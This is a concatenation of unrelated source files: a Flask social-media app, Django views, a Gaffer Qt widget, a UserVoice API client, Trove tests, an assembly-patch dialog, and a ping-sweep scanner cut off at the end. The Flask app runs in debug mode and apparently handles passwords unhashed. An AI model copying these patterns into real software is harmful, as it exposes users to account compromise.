jsonify, request,
redirect, flash, send_file)
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_paranoid import Paranoid
from forms import (Login, Register, PictureUpload,
AudioUpload, VideoUpload, AccountUpdation)
from customValidators import checkForJunk
from models.user import User
from models.post import Post
from models.database import Database
from MongoLogin import *
from uuid import uuid4
from flask_login import (login_user, current_user,
logout_user, LoginManager,
login_required)
from io import BytesIO
app = Flask(__name__)
# NOTE(review): a fresh random SECRET_KEY on every start invalidates all
# existing sessions across restarts -- consider loading it from config.
app.config['SECRET_KEY'] = str(uuid4())
# INIT DATABASE
Database.initialize('Prosfora')
# INIT Login Manager
login_manager = LoginManager()
# for debug
DEBUG = True
@login_manager.user_loader
def load_user(userID):
    """Flask-Login callback: map a session-stored userID to a User object.

    Returns None when no matching user exists, which Flask-Login treats
    as "not logged in".
    """
    userObj = User.findUser(userID=userID)
    print("[FLASK-LOGIN] \nload_user()-> userID = ", userID)
    if not userObj:
        return None
    return User.toClass(userObj)
# Wire Flask-Login into the app. "strong" session protection drops sessions
# whose identifiers change; unauthenticated users are redirected to the
# 'login' view with an "info"-category flash message.
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = 'login'
login_manager.login_message_category = "info"
# Flask extension singletons bound to this application instance.
bootstrap = Bootstrap(app)
moment = Moment(app)
paranoid = Paranoid(app)
paranoid.redirect_view = '/'
##################################################
# Assigning Methods to class
# [Explicitly]
##################################################
# Graft the Flask-Login user-protocol callables (imported via the MongoLogin
# star import) onto User instead of subclassing UserMixin.
User.is_active = is_active
User.is_authenticated = is_authenticated
User.is_anonymous = is_anonymous
User.get_id = get_id
User.load_user = classmethod(load_user)
##################################################
@app.route('/')
def index():
    """Home page: the logged-in user's newsfeed, or an empty feed."""
    feed = (User.newsfeed(current_user.userID)
            if current_user.is_authenticated else [])
    return render_template('index.html', posts=feed, findUser=User.findUser)
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Sign-up page; creates the account and logs the new user in."""
    if current_user.is_authenticated:
        return redirect('/', 302)
    form = Register()
    if request.method == 'POST' and form.validate_on_submit():
        new_user = User(
            name=form.name.data.title(),
            userID=str(uuid4())[::-1],
            username=form.username.data.lower(),
            password=form.password.data,
            email=form.email.data.lower(),
            gender=form.gender.data
        )
        new_user.saveUser()
        login_user(new_user)
        return redirect('/', 302)
    # GET, or failed validation: (re-)render the form.
    return render_template('register.html', form=form)
@app.route('/<string:username>/posts/<string:postID>')
def posts(username, postID):
    """Show a single post page, looked up by its postID."""
    # Resolve the path segment as a username first, then as a userID.
    # NOTE(review): the resolved `user` is never used below -- the lookups
    # only serve to 404 unknown profiles. Confirm that is intentional.
    user = User.findUser(username=username)
    if not user:
        user = User.findUser(userID=username)
        if not user:
            return redirect('/'), 404, {'Refresh': '1; url = /'}
    post = Post.getPostByPostID(postID)
    if post:
        # Random per-render id attached to the post (presumably for unique
        # DOM element ids in post.html -- TODO confirm).
        un = uuid4().int % 1000000
        print('un =>', un)
        post = Post.to_Class(post)
        post.id = un
        userInfo = User.toClass(User.findUser(userID=post.userID))
        return render_template('post.html',
                               post=post,
                               userInfo=userInfo)
    return {'error': 'Post Not Found!'}
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Log an existing user in; already-authenticated users go home."""
    if current_user.is_authenticated:
        return redirect('/', 302)
    form = Login()
    if request.method == 'POST':
        # Login.validate() returns the matching user record (or falsy).
        record = form.validate()
        if record:
            login_user(User(
                _id=record.get('_id'),
                name=record.get('name'),
                userID=record.get('userID'),
                username=record.get('username'),
                email=record.get('email'),
                gender=record.get('gender')
            ))
            return redirect('/', 302)
    return render_template('login.html', form=form)
@app.route('/profile')
@app.route('/profile/<string:username>', methods=['GET', 'POST'])
def profile(username=None):
    """Show a user's profile; POST handles follow/unfollow of that user."""
    userInfo = {}
    # Reject junk or overlong usernames before touching the database.
    if username and not checkForJunk(
            usrtext=username) and not (len(username) > 20):
        userInfo = User.findUser(username=username)
        if userInfo:
            userInfo = User.toClass(userInfo)
            user = User.findUser(username=username)
            # print('profilePicture: ',userInfo.profilePicture)
            if request.method == "POST":
                if current_user.is_authenticated:
                    cuser = User.findUser(userID=current_user.userID)
                    # The submitted button name selects the action.
                    if request.form.get('follow'):
                        User.follow(cuser, user)
                        print('about to start following..')
                    elif request.form.get('unfollow'):
                        User.follow(cuser, user, unfollow=True)
                        print('about to start unfollowing..')
                    # Redirect (post/redirect/get) so refresh won't re-post.
                    return redirect(f'/profile/{username}')
                else:
                    print('user is not authenticated')
            posts = Post.getPostsByUserID(userID=user.get('userID'), all=True)
            return render_template('profile.html', userInfo=userInfo, posts=posts)
        else:
            return redirect('/'), 404, {'Refresh': '1; url = /'}
    elif username is None and current_user.is_authenticated:
        # Bare /profile: jump to the logged-in user's own profile.
        return redirect(f'/profile/{current_user.username}')
    else:
        return redirect('/'), 404, {'Refresh': '1; url = /'}
@app.route("/upload", methods=['GET', 'POST'])
@app.route("/upload/picture", methods=['GET', 'POST'])
@app.route("/upload/video", methods=['GET', 'POST'])
@app.route("/upload/audio", methods=['GET', 'POST'])
@login_required
def uploadContent():
    """Serve the upload pages and create a Post from a submitted file.

    One handler backs four routes: the request path selects the template,
    the form class and the stored content type from the `urls` table.

    Bug fixed: `AlbumArt` was only assigned inside the Audio branch, so
    Picture/Video uploads crashed with UnboundLocalError at User.Post().
    """
    # path -> [template, form class, content type]; the bare /upload entry
    # has only two items, so both [1] and [-1] resolve to None there.
    urls = {
        "/upload": ["upload.html", None],
        "/upload/picture": ["upload_picture.html", PictureUpload, 'Picture'],
        "/upload/video": ["upload_video.html", VideoUpload, 'Video'],
        "/upload/audio": ["upload_audio.html", AudioUpload, 'Audio']
    }
    url = urls.get(request.path)[0]
    form = urls.get(request.path)[1]
    contentType = urls.get(request.path)[-1]
    if form:
        form = form()
    if request.method == 'GET':
        if url:
            return render_template(url, form=form)
        else:
            return redirect('/'), 404, {'Refresh': '1; url = /'}
    else:
        if form.validate_on_submit():
            content = form.file.data.read()
            title = form.title.data
            description = form.description.data
            userID = current_user.userID
            postID = uuid4().hex
            # Only audio uploads may carry optional album art.
            AlbumArt = None
            if contentType == 'Audio':
                art_field = form.AlbumArt.data
                if art_field:
                    AlbumArt = art_field.read()
            result = User.Post(title=title,
                               content=content,
                               contentType=contentType,
                               userID=userID,
                               postID=postID,
                               description=description,
                               AlbumArt=AlbumArt)
            if result:
                return redirect(f'/{current_user.username}/posts/{postID}')
            else:
                return 'Something went wrong..'
        else:
            # Validation failed: re-render the form with its errors.
            return render_template(url, form=form)
@app.route('/data/<string:postID>.<string:ext>')
@app.route('/data/<string:AlbumArt>/<string:postID>.jpeg')
@app.route('/profile/<string:userID>/<string:profilePic>.jpeg')
@app.route('/profile/<string:userID>/<string:coverPhoto>.jpeg')
def resources(postID=None,
              userID=None,
              contentID=None,
              AlbumArt=None,
              profilePic=None,
              coverPhoto=None,
              ext=None):
    """Stream a stored binary resource (post media, album art, or a
    user's profile/cover photo) out of the database.

    Bugs fixed: the original computed the mimetype from `post` even on the
    profile/cover branches, where `post` was never assigned, raising a
    NameError for every profile-image request; album art was served with
    the parent post's mimetype (e.g. audio/mpeg) despite being a JPEG; and
    `ext` is unbound (None) on the jpeg-only routes, yielding filenames
    ending in ".None".
    """
    if postID is not None:
        post = Post.getPostByPostID(postID)
        if not post:
            return redirect('/'), 404, {'Refresh': '1; url = /'}
        if AlbumArt:
            # Album art is served from the post but is always a JPEG.
            data = post.get('AlbumArt')
            mimetype = 'image/jpeg'
        else:
            data = post.get('content')
            mimetype = {
                'Audio': 'audio/mpeg',
                'Video': 'video/mp4',
                'Picture': 'image/jpeg'
            }.get(post.get('contentType'))
    else:
        user = User.findUser(userID=userID)
        if not user:
            return redirect('/'), 404, {'Refresh': '1; url = /'}
        # Both profile and cover photos are stored and served as JPEG.
        data = user.get('profilePic') if profilePic else user.get('coverPhoto')
        mimetype = 'image/jpeg'
    data = data.get('file')
    # The jpeg-only routes never bind `ext`; default the filename suffix.
    return send_file(
        BytesIO(data),
        mimetype=mimetype,
        as_attachment=True,
        attachment_filename=f"{uuid4().hex}.{ext or 'jpeg'}")
@app.route('/profile/<string:username>/followers')
@app.route('/profile/<string:username>/following')
@login_required
def followers(username=None):
    """Render either the followers or the following list for a profile."""
    if not username:
        return redirect('/'), 404, {'Refresh': '1; url = /'}
    uid = User.findUser(username=username)['userID']
    # The route path decides which direction of the relation to show.
    if "followers" in request.path:
        people = User.getFollowers(userID=uid)
    else:
        people = User.getFollowers(userID=uid, following=True)
    return render_template('followers.html', users=people)
@app.route('/explore')
def explore():
    """Static explore page."""
    return render_template('explore.html')
@app.route('/featured')
def featured():
    """Static featured-content page."""
    return render_template('featured.html')
@app.route('/about')
def about():
    """Static about page."""
    return render_template('about.html')
@app.route('/contact')
def contact():
    """Static contact page."""
    return render_template('contact.html')
@app.route('/logout')
@login_required
def logout():
    """End the current session and send the user home."""
    logout_user()
    return redirect('/', 302)
@app.route('/search')
def search():
    """Static search page (search itself runs client-side)."""
    return render_template('search.html')
@app.route('/settings', methods=['GET', 'POST'])
@login_required
def settings():
    """Account settings page; applies only the fields the user filled in."""
    form = AccountUpdation()
    if request.method == "POST":
        if form.validate_on_submit():
            data = {}
            if form.username.data:
                data['username'] = form.username.data
            if form.coverphoto.data:
                # NOTE(review): picture is stored via .read() below, but the
                # cover photo stores the raw field value -- confirm whether
                # this should also be .read() of the uploaded file.
                data['coverPhoto'] = form.coverphoto.data
            if form.email.data:
                data['email'] = form.email.data
            if form.picture.data:
                data['profilePic'] = form.picture.data.read()
            if data:
                print("Data received by Settings() :", data)
                cu = User.findUser(userID=current_user.userID)
                cu.update(data)
                User.updateUserInfo(cu)
    return render_template('settings.html', form=form)
# Run the Flask development server when executed directly.
if __name__ == "__main__":
    app.run(debug=DEBUG)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 13. Write a program that reads a number and prints the corresponding day of
# the week (1 - Sunday, 2 - Monday, etc.); any other value reports "invalid".
# (Python 2 script: uses print statements and raw_input; the user-facing
# strings are intentionally left in Portuguese.)
dias_da_semana = ["Inválido", "Domingo", "Segunda", "Terça", "Quarta", "Quinta", "Sexta", "Sábado"]
print "Informe um número correspondente ao dia da semana. (1-Domingo, 2- Segunda, etc.)"
# NOTE(review): iterating over dias_da_semana merely repeats the prompt
# len(dias_da_semana) == 8 times; the loop variable `i` is unused.
for i in dias_da_semana:
    numero = int(raw_input("Número: "))
    if numero >= 1 and numero <= 7: print numero, "-", dias_da_semana[numero]
    else: print "O número não corresponde a um dia da semana. Tente novamente."
|
from django.shortcuts import render
from myapp.models import *
# Create your views here.
def index(request):
    """Render the site landing page."""
    return render(request, "index.html")
# Display all()
def display(request):
    """Render every Topic, Webpage and Access_Details record."""
    context = {
        'topics': Topic.objects.all(),
        'webpages': Webpage.objects.all(),
        'access_details': Access_Details.objects.all(),
    }
    return render(request, "display.html", context=context)
# Display ascending order
def display_asc(request):
    """Render Access_Details records ordered by date, ascending."""
    ordered = Access_Details.objects.order_by('date')
    return render(request, "display_asc.html", context={'dates': ordered})
# Display a specific record # using get(key:value)
def display_specific(request):
    """Placeholder page for fetching one record with get(field=value)."""
    # webpage_details = Webpage.objects.get(:)
    return render(request, "display_specific.html")
# Display the filter data
def filter_data(request):
    """Render webpages whose `top_name` field matches "Music"."""
    music_pages = Webpage.objects.filter(top_name="Music")
    return render(request, "filter_data.html", context={'webpage': music_pages})
# startswith, endswith, and contains check
def like_data(request):
    # Template demonstrates startswith/endswith/contains query lookups.
    return render(request, "like_data.html")
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferUI
from Qt import QtWidgets
from Qt import QtCore
class Label( GafferUI.Widget ) :

	"""A widget for displaying a piece of static (optionally selectable) text."""

	## \todo Remove these and just reference them directly
	HorizontalAlignment = GafferUI.HorizontalAlignment
	VerticalAlignment = GafferUI.VerticalAlignment

	def __init__( self, text="", horizontalAlignment=HorizontalAlignment.Left, verticalAlignment=VerticalAlignment.Center, **kw ) :

		GafferUI.Widget.__init__( self, QtWidgets.QLabel( text ), **kw )

		# by default the widget would accept both shrinking and growing, but we'd rather it just stubbornly stayed
		# the same size. it's particularly important that it doesn't accept growth vertically as then vertical ListContainers
		# don't shrink properly when a child is hidden or shrunk - instead the container would distribute the extra height
		# among all the labels.
		self._qtWidget().setSizePolicy( QtWidgets.QSizePolicy( QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed ) )

		self.setAlignment( horizontalAlignment, verticalAlignment )

	def setText( self, text ) :

		self._qtWidget().setText( text )

	def getText( self ) :

		return str( self._qtWidget().text() )

	def setAlignment( self, horizontalAlignment, verticalAlignment ) :

		# The two alignments are OR-ed into a single Qt alignment bitmask.
		self._qtWidget().setAlignment(
			GafferUI.HorizontalAlignment._toQt( horizontalAlignment ) |
			GafferUI.VerticalAlignment._toQt( verticalAlignment )
		)

	def getAlignment( self ) :

		a = self._qtWidget().alignment()
		return (
			GafferUI.HorizontalAlignment._fromQt( a ),
			GafferUI.VerticalAlignment._fromQt( a ),
		)

	def setTextSelectable( self, selectable ) :

		# Clear the flag first so that passing False actually disables selection.
		flags = self._qtWidget().textInteractionFlags()
		flags &= ~QtCore.Qt.TextSelectableByMouse
		if selectable :
			flags |= QtCore.Qt.TextSelectableByMouse
		self._qtWidget().setTextInteractionFlags( flags )

	def getTextSelectable( self ) :

		return bool( self._qtWidget().textInteractionFlags() & QtCore.Qt.TextSelectableByMouse )

	def linkActivatedSignal( self ) :

		# The signal (and its Qt connection) is created lazily on first access.
		try :
			return self.__linkActivatedSignal
		# Narrowed from a bare `except :` so that only the expected missing
		# attribute falls through to creation, not KeyboardInterrupt etc.
		except AttributeError :
			self.__linkActivatedSignal = GafferUI.WidgetEventSignal()
			self._qtWidget().linkActivated.connect( Gaffer.WeakMethod( self.__linkActivated ) )
			return self.__linkActivatedSignal

	def __linkActivated( self, link ) :

		self.__linkActivatedSignal( self, str( link ) )
|
import argparse
import os
import imageio
def main():
    """Convert every regular file in the given folder to PNG in <folder>_png."""
    parser = argparse.ArgumentParser()
    parser.add_argument("folder", help="Pasta com ppms para converter para JPG")
    args = parser.parse_args()
    folder = os.path.abspath(args.folder)
    # Only regular files; subdirectories are skipped.
    onlyfiles = [f for f in os.listdir(folder) if os.path.isfile(os.path.join(folder, f))]
    out_path = folder + "_png"
    # exist_ok avoids the race between an exists() check and makedirs().
    os.makedirs(out_path, exist_ok=True)
    for name in onlyfiles:
        src = os.path.join(folder, name)
        print(src)
        im = imageio.imread(src)
        # splitext handles any extension length (the original sliced off
        # exactly 4 characters, which breaks e.g. ".jpeg").
        dst = os.path.join(out_path, os.path.splitext(name)[0] + ".png")
        print(dst)
        imageio.imsave(dst, im, "PNG")


if __name__ == "__main__":
    main()
|
import os
from PyQt5.QtWidgets import QDialog, QMessageBox
from ui.patch import Ui_PatchDialog
from utils import AsmUtil
class patchForm(QDialog, Ui_PatchDialog):
    """Dialog for entering a code patch (module name + address + patch bytes).

    The hex-bytes box and the assembly box are kept in sync: editing either
    one re-(dis)assembles and rewrites the other.
    """

    def __init__(self, parent=None):
        super(patchForm, self).__init__(parent)
        self.setupUi(self)
        self.setWindowOpacity(0.93)
        self.btnSubmit.clicked.connect(self.submit)
        # Values handed back to the caller after a successful submit().
        self.moduleName = ""
        self.address = ""
        self.patch = ""
        self.btnClear.clicked.connect(self.clearUi)
        self.clearUi()
        self.flushCmb()
        self.listModule.itemClicked.connect(self.ModuleItemClick)
        self.txtModule.textChanged.connect(self.changeModule)
        self.cmbPackage.currentTextChanged.connect(self.changePackage)
        self.modules = None
        self.txtPatch.textChanged.connect(self.changePatchCode)
        self.txtPatchAsm.textChanged.connect(self.changePatchAsm)

    def initData(self):
        """Refill the module list widget from self.modules."""
        self.listModule.clear()
        for item in self.modules:
            self.listModule.addItem(item)

    def flushCmb(self):
        """Populate the package combo box from cached ./tmp/*.modules.txt files."""
        self.cmbPackage.clear()
        files = os.listdir("./tmp/")
        self.cmbPackage.addItem("选择缓存数据")
        for item in files:
            if ".modules.txt" in item:
                self.cmbPackage.addItem(item.replace(".modules.txt", ""))

    def ModuleItemClick(self, item):
        # Clicking a list entry copies it into the module text box.
        self.txtModule.setText(item.text())

    def changeModule(self, data):
        """Filter the module list as the user types in the module box."""
        # `is None` instead of `== None` for identity comparison.
        if self.modules is None or len(self.modules) <= 0:
            return
        if data == "" or data == "选择缓存数据":
            return
        self.listModule.clear()
        if len(data) > 0:
            for item in self.modules:
                if data in item:
                    self.listModule.addItem(item)
        else:
            for item in self.modules:
                self.listModule.addItem(item)

    def changePackage(self, data):
        """Load the module list cached for the selected package."""
        if data == "" or data == "选择缓存数据":
            return
        filepath = "./tmp/" + data + ".modules.txt"
        with open(filepath, "r", encoding="utf-8") as packageFile:
            res = packageFile.read()
        self.modules = res.split("\n")
        self.initData()

    def changePatchCode(self, data):
        """Disassemble the hex bytes and mirror the result into the asm box."""
        try:
            codebuff = AsmUtil.StrToHexSplit(data)
            res = AsmUtil.disasm(self.cmbMode.currentIndex(), codebuff)
            # Disconnect first so setText() doesn't trigger changePatchAsm
            # and bounce the update straight back.
            self.txtPatchAsm.textChanged.disconnect(self.changePatchAsm)
            self.txtPatchAsm.setText(res)
            self.txtPatchAsm.textChanged.connect(self.changePatchAsm)
        except Exception:
            # Partial/invalid hex while the user is typing is expected; ignore.
            pass

    def changePatchAsm(self, data):
        """Assemble the asm text and mirror the bytes into the hex box."""
        try:
            res = AsmUtil.asm(self.cmbMode.currentIndex(), data)
            # Disconnect to avoid re-triggering changePatchCode from setText().
            self.txtPatch.textChanged.disconnect(self.changePatchCode)
            self.txtPatch.setText(res)
            self.txtPatch.textChanged.connect(self.changePatchCode)
        except Exception:
            # Partial/invalid assembly while the user is typing is expected; ignore.
            pass

    def clearUi(self):
        """Reset the three input boxes."""
        self.txtModule.setText("")
        self.txtAddress.setText("")
        self.txtPatch.setText("")

    def submit(self):
        """Validate the inputs, stash them on the instance and accept the dialog."""
        moduleName = self.txtModule.text()
        address = self.txtAddress.text()
        patch = self.txtPatch.text()
        if len(moduleName) <= 0 or len(address) <= 0 or len(patch) <= 0:
            # NOTE(review): the message ("类名为空") only mentions an empty name
            # although module/address/patch are all validated -- kept verbatim
            # to preserve behaviour.
            QMessageBox().information(self, "提示", "类名为空")
            return
        self.moduleName = moduleName
        self.address = address
        self.patch = patch
        self.accept()
from future import standard_library
standard_library.install_aliases()
from builtins import object
import operator
import array
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import json
import uservoice
from requests_oauthlib import OAuth1
from urllib.parse import parse_qs
import requests
# Library version, reported to the server via the API-Client header.
version = '0.0.23'


class APIError(RuntimeError):
    """Base class for all UserVoice API failures."""
    pass


class Unauthorized(APIError):
    """Authentication missing or rejected by the server."""
    pass


class NotFound(APIError):
    """The requested record does not exist (HTTP 404)."""
    pass


class RateLimitExceeded(APIError):
    """Too many requests (HTTP 429)."""
    pass


class ApplicationError(APIError):
    """The server reported an application-level error."""
    pass
class Client(object):
    """Minimal UserVoice REST client with optional OAuth1 request signing."""

    def __init__(self, subdomain_name, api_key, api_secret=None, oauth_token='', oauth_token_secret='', callback=None, protocol=None, uservoice_domain=None):
        """
        :param subdomain_name: e.g. 'acme' for acme.uservoice.com
        :param api_key: application key; without api_secret, requests are
            unsigned and the key is sent as a `client` query parameter
        :param api_secret: application secret used for OAuth1 signing
        :param oauth_token: resource-owner token (access or request token)
        :param oauth_token_secret: matching token secret
        :param callback: OAuth callback URI
        :param protocol: defaults to 'https'
        :param uservoice_domain: defaults to 'uservoice.com'
        """
        self.request_token = None
        self.token = oauth_token
        self.secret = oauth_token_secret
        self.default_headers = {'Content-Type': 'application/json', 'Accept': 'application/json', 'API-Client': 'uservoice-python-' + version}
        if api_secret:
            self.oauth = OAuth1(api_key, api_secret, resource_owner_key=self.token, resource_owner_secret=self.secret, callback_uri=callback)
        else:
            self.oauth = None
        self.api_url = "{protocol}://{subdomain_name}.{uservoice_domain}".format(
            subdomain_name=subdomain_name,
            protocol=(protocol or 'https'),
            uservoice_domain=(uservoice_domain or 'uservoice.com')
        )
        self.api_key = api_key
        self.api_secret = api_secret
        self.callback = callback
        self.subdomain_name = subdomain_name
        self.uservoice_domain = uservoice_domain
        self.protocol = protocol

    def get_request_token(self, callback=None):
        """Fetch an OAuth request token; returns a new Client bound to it."""
        url = self.api_url + '/oauth/request_token'
        body = {}
        if self.callback or callback:
            body['oauth_callback'] = callback or self.callback
        oauth = OAuth1(self.api_key, self.api_secret, callback_uri=self.callback)
        resp = requests.post(url, body, headers=self.default_headers, auth=oauth)
        token = parse_qs(resp.text)
        if 'oauth_token' not in token or 'oauth_token_secret' not in token:
            raise Unauthorized('Failed to get request token')
        return self.login_with_access_token(token['oauth_token'][0], token['oauth_token_secret'][0])

    def authorize_url(self):
        """Return the URL the resource owner should visit to authorize us."""
        self.request_token = self.get_request_token()
        url = self.api_url + '/oauth/authorize?oauth_token=' + self.request_token.token
        return url

    def login_with_verifier(self, verifier=None):
        """Exchange the stored request token plus *verifier* for an access token."""
        url = self.api_url + '/oauth/access_token'
        oauth = OAuth1(self.api_key, self.api_secret, resource_owner_key=self.request_token.token, resource_owner_secret=self.request_token.secret, callback_uri=self.callback, verifier=verifier)
        resp = requests.post(url, auth=oauth)
        token = parse_qs(resp.text)
        return self.login_with_access_token(token['oauth_token'][0], token['oauth_token_secret'][0])

    def login_with_access_token(self, token, secret):
        """Return a new Client authenticated with the given access token."""
        return Client(self.subdomain_name, self.api_key, self.api_secret, oauth_token=token, oauth_token_secret=secret, callback=self.callback,
                      protocol=self.protocol,
                      uservoice_domain=self.uservoice_domain)

    def request(self, method, path, params=None):
        """
        Perform an HTTP request against the API and return the decoded JSON.

        :param method: 'get'/'put'/'post'/'delete' (case-insensitive)
        :param path: API path, e.g. '/api/v1/users'
        :param params: JSON body parameters; None means an empty dict (a None
            default avoids sharing one mutable dict across all calls)
        :raises Unauthorized, NotFound, RateLimitExceeded, ApplicationError,
            APIError: mapped from the 'errors' key of the response
        """
        if params is None:
            params = {}
        method = method.upper()
        url = self.api_url + path
        if self.api_secret is None:
            # Unsigned (key-only) access: pass the API key as a query parameter.
            if '?' in url:
                url += '&client=' + self.api_key
            else:
                url += '?client=' + self.api_key
        json_resp = None
        if method == 'POST':
            json_resp = requests.post(url, json.dumps(params), headers=self.default_headers, auth=self.oauth)
        elif method == 'PUT':
            json_resp = requests.put(url, json.dumps(params), headers=self.default_headers, auth=self.oauth)
        elif method == 'GET':
            json_resp = requests.get(url, headers=self.default_headers, auth=self.oauth)
        elif method == 'DELETE':
            json_resp = requests.delete(url, headers=self.default_headers, auth=self.oauth)
        attrs = {}
        try:
            # 404/429 bodies are not guaranteed to be JSON; synthesize errors.
            if json_resp.status_code == 404:
                attrs = {'errors': {'type': 'record_not_found'}}
            elif json_resp.status_code == 429:
                attrs = {'errors': {'type': 'rate_limit_exceeded'}}
            else:
                attrs = json_resp.json()
        except json.JSONDecodeError as e:
            raise APIError(e)
        if 'errors' in attrs:
            if attrs['errors']['type'] == 'unauthorized':
                raise Unauthorized(attrs)
            elif attrs['errors']['type'] == 'record_not_found':
                raise NotFound(attrs)
            elif attrs['errors']['type'] == 'rate_limit_exceeded':
                raise RateLimitExceeded(attrs)
            elif attrs['errors']['type'] == 'application_error':
                raise ApplicationError(attrs)
            else:
                raise APIError(attrs)
        return attrs

    # handy delegate methods (params=None mirrors request())
    def get(self, path, params=None): return self.request('get', path, params)
    def put(self, path, params=None): return self.request('put', path, params)
    def post(self, path, params=None): return self.request('post', path, params)
    def delete(self, path, params=None): return self.request('delete', path, params)

    def get_collection(self, path, **opts):
        """Return a lazy, paginated collection for *path*."""
        return uservoice.Collection(self, path, **opts)

    def login_as(self, email):
        """Return a Client impersonating the user identified by *email*."""
        resp = self.post('/api/v1/users/login_as', {
            'request_token': self.get_request_token().token,
            'user': {'email': email}
        })
        if 'token' in resp:
            token = resp['token']['oauth_token']
            secret = resp['token']['oauth_token_secret']
            return self.login_with_access_token(token, secret)
        else:
            raise Unauthorized(resp)

    def login_as_owner(self):
        """Return a Client authenticated as the account owner."""
        resp = self.post('/api/v1/users/login_as_owner', {
            'request_token': self.get_request_token().token
        })
        if 'token' in resp:
            token = resp['token']['oauth_token']
            secret = resp['token']['oauth_token_secret']
            return self.login_with_access_token(token, secret)
        else:
            raise Unauthorized(resp)

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        pass
|
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from proboscis import before_class
from proboscis import test
from proboscis.asserts import assert_equal
from proboscis.asserts import assert_raises
from trove import tests
from trove.scheduledtask.models import DBScheduledTaskType
from trove.tests.util import test_config
from trove.tests.util import create_dbaas_client
from trove.tests.util.users import Requirements
from trove.tests.util.check import TypeCheck
from troveclient.compat import exceptions
# Whether the test configuration targets the fake (in-process) backend.
FAKE_MODE = test_config.values['fake_mode']
# Proboscis group name for these management-API tests.
GROUP = "dbaas.api.mgmt.scheduledtasktypes"
@test(groups=[tests.DBAAS_API, GROUP])
class ScheduledTaskTypesTest(object):
    """Management-API tests for listing, disabling and enabling task types."""
    @before_class
    def setUp(self):
        # The mgmt endpoints require an admin user.
        self.user = test_config.users.find_user(Requirements(is_admin=True))
        self.client = create_dbaas_client(self.user)
        # Seed one known task type to operate on in the tests below.
        self.type = "test"
        DBScheduledTaskType.create(type="test", enabled=True,
                                   description="test")
    @test
    def test_scheduledtasktype_list(self):
        # Listing must include at least the seeded type, with all documented fields.
        types = self.client.scheduledtasktypes.list()
        assert(len(types) > 0)
        for type in types:
            with TypeCheck('ScheduledTaskType', type) as check:
                # NOTE(review): basestring is Python 2 only -- confirm this
                # suite still runs under a py2 interpreter.
                check.has_field("type", basestring)
                check.has_field("description", basestring)
                check.has_field("enabled", bool)
                check.has_field("links", list)
    @test()
    def test_scheduledtasktype_disable(self):
        # Unknown names must 404; disabling the seeded type must be reflected.
        assert_raises(exceptions.NotFound,
                      self.client.scheduledtasktypes.disable, 'nonexistent')
        type_data = self.client.scheduledtasktypes.disable(self.type)
        assert_equal(type_data.enabled, False)
    @test(runs_after=[test_scheduledtasktype_disable])
    def test_scheduledtasktype_enable(self):
        # Runs after the disable test so re-enabling is a real state change.
        assert_raises(exceptions.NotFound,
                      self.client.scheduledtasktypes.enable, 'nonexistent')
        type_data = self.client.scheduledtasktypes.enable(self.type)
        assert_equal(type_data.enabled, True)
|
import ConfigParser
from config.server import ServerConfig
from net.server import TerrariaServer
def load_config():
    """Read server.cfg from the working directory into a ServerConfig."""
    parser = ConfigParser.RawConfigParser()
    parser.read('server.cfg')
    return ServerConfig().from_config(parser)
def main():
    """Load the configuration and run the Terraria server until shutdown."""
    cfg = load_config()
    TerrariaServer(cfg).run()


if __name__ == '__main__':
    main()
|
#coding=utf-8
__author__ = '冬冬'
from CheckOnline.ping import ping
import threading
# Guards concurrent writes to ipAddressDict from the scan() worker threads.
lock = threading.Lock()
# Shared result map: ip -> 'YES' (reachable) / 'NO' (unreachable).
ipAddressDict={}
def scan(ip, timeout=0.1):
    """Ping *ip* once and record 'YES'/'NO' in the shared ipAddressDict.

    :param ip: address to probe
    :param timeout: per-ping timeout in seconds
    """
    global ipAddressDict
    # ping() returning None means no reply -- presumably it returns a latency
    # value on success; TODO confirm against CheckOnline.ping.
    status = 'YES' if ping(ip, timeout) is not None else 'NO'
    # `with` releases the lock even if the dict write raises, unlike the
    # original explicit acquire()/release() pair.
    with lock:
        ipAddressDict[ip] = status
def netTest(ipAddressList):
    """Ping every address in *ipAddressList* concurrently.

